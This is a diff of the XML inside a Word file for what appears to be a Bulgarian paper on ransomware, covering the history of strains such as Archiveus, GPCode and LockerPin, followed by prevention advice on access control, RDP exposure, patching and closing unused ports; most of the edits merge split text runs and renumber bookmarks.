+                        <a:schemeClr val="bg2">
+                          <a:shade val="45000"/>
+                          <a:satMod val="135000"/>
+                        </a:schemeClr>
+                        <a:prstClr val="white"/>
+                      </a:duotone>
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2240,7 +2226,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc223299645"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc223339497"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2279,19 +2265,11 @@
       <w:r>
         <w:t xml:space="preserve"> Към вирусите се прилагат по-силни криптиращи алгоритми. </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Archiveus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Trojan</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Archiveus Trojan</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> е първият вирус да използва асиметричен алгоритъм за криптиране на данни – </w:t>
@@ -2470,31 +2448,21 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Archiveus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Trojan</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Archiveus Trojan</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> криптира всичко в </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>MyDocuments</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> директорията (фиг. 4) и изисква от потърпевшия да закупи артикули от онлайн аптека, в замяна ще получи 30 символен код, за да възстанови всичките си файлове.</w:t>
       </w:r>
@@ -2505,15 +2473,7 @@
         <w:t>,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> някои от файловете остават </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>коруптнати</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve"> някои от файловете остават коруптнати. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2626,23 +2586,13 @@
         </w:rPr>
         <w:t xml:space="preserve">зглед на </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Archiveus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Trojan</w:t>
+        <w:t>Archiveus Trojan</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2687,7 +2637,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223299646"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223339498"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2730,15 +2680,7 @@
         <w:t xml:space="preserve">капитал </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>фишинг</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
+        <w:t xml:space="preserve">на хакера. Постигат го чрез изграждане на фалшиви истории или сценарии. Често фишинг заплахите са прикачени в имейли, социални мрежи, текстови съобщения или телефонни разговори. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2762,16 +2704,8 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">spear phishing ransomware. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>spear phishing ransomware. GPCode</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> се разпространява през електронни пощи като прикачен файл под формата на заявление за работа. </w:t>
       </w:r>
@@ -2835,50 +2769,32 @@
       <w:r>
         <w:t xml:space="preserve">Първите версии на </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>GPCode</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> използват симетрично криптиране, където </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">ключът за криптиране и декриптиране е един и същ. Това го прави лесен за разбиване. Друг недостатък на първоначалния </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GpCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">GpCode, </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">е че файловете, които се криптират се запазват на нова локация, а некриптираните се изтриват. </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Undeletion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> utility</w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Undeletion utility</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> може да възстанови част от файловете.</w:t>
@@ -3007,18 +2923,8 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>GPCode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> GPCode</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3145,7 +3051,6 @@
         </w:rPr>
         <w:t xml:space="preserve">нструкции за откуп, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3154,7 +3059,6 @@
         </w:rPr>
         <w:t>GPCode</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
@@ -3189,7 +3093,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc223299647"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc223339499"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3220,15 +3124,8 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>LockerPin</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> е първият </w:t>
       </w:r>
@@ -3245,21 +3142,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>LockerPin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> – LockerPin.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> Опитва да достъпи административни правомощия маскирайки се като софтуерен ъпдейт на телефона, виж фигура 7.</w:t>
@@ -3289,7 +3172,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDBEF8F" wp14:editId="105F3BD3">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CDBEF8F" wp14:editId="5F4DC86F">
             <wp:extent cx="2838734" cy="5047439"/>
             <wp:effectExtent l="0" t="0" r="0" b="1270"/>
             <wp:docPr id="744506339" name="Picture 2"/>
@@ -3378,7 +3261,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc223299648"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc223339500"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3482,39 +3365,7 @@
         <w:ind w:firstLine="708"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">За да оптимизират атаките си, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> операторите променят стратегията си. Те се отказват от метода „</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>spray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
+        <w:t>За да оптимизират атаките си, ransomware операторите променят стратегията си. Те се отказват от метода „spray and pray“, при който зловредният софтуер се разпространява масово, без конкретен избор на жертва. Вместо това започват да таргетират конкретни организации и потребители</w:t>
       </w:r>
       <w:r>
         <w:t>, или известно още като</w:t>
@@ -3549,14 +3400,12 @@
       <w:r>
         <w:t xml:space="preserve"> и </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>TravelEx</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, заплатили съответно 600 000</w:t>
       </w:r>
@@ -3612,15 +3461,7 @@
         <w:t xml:space="preserve">BGH. </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>деплойва</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Започва през едно инфектирано устройство и се разпространява към всички възможни системи в мрежата. Процесът се повтаря, докато се заразяват възможно най-много системи. После се деплойва </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3642,7 +3483,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223299649"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223339501"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -3661,15 +3502,7 @@
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Настоящите препоръки за превенция и реакция при </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ransomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> атаки се базират на оперативния опит на организации като CISA, NSA, FBI и MS-ISAC. Насоките са предназначени както за ИТ специалисти, така и за лица, участващи в </w:t>
+        <w:t xml:space="preserve">Настоящите препоръки за превенция и реакция при ransomware атаки се базират на оперативния опит на организации като CISA, NSA, FBI и MS-ISAC. Насоките са предназначени както за ИТ специалисти, така и за лица, участващи в </w:t>
       </w:r>
       <w:r>
         <w:t>изготвянето</w:t>
@@ -3701,10 +3534,10 @@
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
+          <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc223299650"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc223339502"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -3715,16 +3548,7 @@
         <w:t>Ransomware</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Data Extortion </w:t>
-      </w:r>
-      <w:r>
-        <w:t>инциденти</w:t>
+        <w:t xml:space="preserve"> инциденти</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
     </w:p>
@@ -3881,22 +3705,522 @@
         <w:t xml:space="preserve"> за превенция на неоторизиран достъп до данни и услуги. Достъпът до данните трябва да бъде възможно най-гранулярен. Тоест </w:t>
       </w:r>
       <w:r>
-        <w:t>https://www.educative.io/answers/what-is-granular-access-control</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:t>необходимо е създаването на различни роли, които дават правомощия към определени данни и за определен срок. Така се избягва проблеми, където потребителите имат пълни правомощия към всяка една услуга. Свързването към частна мрежа не е достатъчно безопасно.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Права се дават само при необходимост.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="10" w:name="_Toc223339503"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Превенция </w:t>
+      </w:r>
+      <w:r>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>интернет-достъпни</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+      <w:r>
+        <w:t>уязвимости</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
       <w:r>
+        <w:t xml:space="preserve">Не трябва да се разкриват услуги като </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Remote Desktop Protocol</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> в интернет. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Remote Desktop</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> представлява свързване на даден потребител към отдалечена среда през интернет. Ако по някаква причина такава услуга се налага е важно да се вземат превантивни мерки към често срещани </w:t>
+      </w:r>
+      <w:r>
+        <w:t>първоначални векторни атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (фиг. 8)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Всички ненужни </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> апликации и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">network </w:t>
+      </w:r>
+      <w:r>
+        <w:t>протоколи трябва да са забравени.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Честа</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> проверка за уязвимости</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> също е от ключово значение</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Особено сканове за тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е също важно. Трябва да се приоритизира ъпдейти на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> свързани с процесването на интернет данни – уеб </w:t>
+      </w:r>
+      <w:r>
+        <w:t>браузери</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и плъгини. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Малкият и средният бизнес често имат такъв проблем с поддържка на актуализациите, поради липсва на отделен </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">security </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> maintain</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> екипи.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>managed cloud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exchange server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> identity server </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mail gateway.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Също има</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cloud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> следи за уязвимости, пачва системи и има защити против </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DDOS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Уверете се, че всички </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>on-premise</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, облачни, мобилни и лични</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>устройства</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> са правилно конфигурирани и функциите за сигурност са активирани.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Допълнително е необходимо да се спрат всички портове и протоколи, които не се предназначени за бизнес употреба</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>фиг. 9)</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A5770E8" wp14:editId="609A8FB0">
+            <wp:extent cx="4953000" cy="1962200"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="125626481" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="125626481" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4973747" cy="1970419"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Фиг. 8 – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">диаграма описваща превенция на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>internet-facing vulnerabilities</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Експлоатация на услуги</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FDC3FD6" wp14:editId="29939F6A">
+            <wp:extent cx="5219700" cy="2015498"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="383783366" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="383783366" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5231680" cy="2020124"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:br/>
+        <w:t xml:space="preserve">(Фиг. 9 – диаграма описваща превенция на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>internet-facing vulnerabilities</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>. Ограничаване на достъпа</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-    </w:p>
-    <w:bookmarkStart w:id="10" w:name="_Toc223299651" w:displacedByCustomXml="next"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
